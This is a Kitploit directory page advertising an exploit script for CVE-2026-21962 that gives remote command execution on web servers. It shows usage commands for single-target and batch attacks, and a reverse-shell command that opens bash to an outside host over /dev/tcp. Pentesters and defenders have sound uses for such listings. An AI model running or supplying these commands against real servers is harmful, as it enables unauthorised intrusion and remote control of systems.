Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-21962 — Exploit script for CVE-2026-21962, enabling remote command execution on vulnerable web servers with single-target, batch, and reverse shell modes. | Kitploit
Tools/GitHubGitHub/thumpbo/cve-2026-21962
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubthumpbo/cve-2026-21962

CVE-2026-21962

Exploit script for CVE-2026-21962, enabling remote command execution on vulnerable web servers with single-target, batch, and reverse shell modes.

View Repository
237 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-21962

CVE-2026-21962

EXAMPLE 单目标

root@kitploit:~
python3 CVE-2026-21962.py http://target:7001 -c "whoami"

批量 + 默认 whoami

root@kitploit:~
python3 CVE-2026-21962.py -f url.txt

批量 + 自定义命令 + 改线程数

root@kitploit:~
python3 CVE-2026-21962.py -f url.txt -c "id" --threads 20 -o result.txt

反弹 shell 示例

root@kitploit:~
python3 CVE-2026-21962.py -f targets.txt -c "bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'"
Download Tool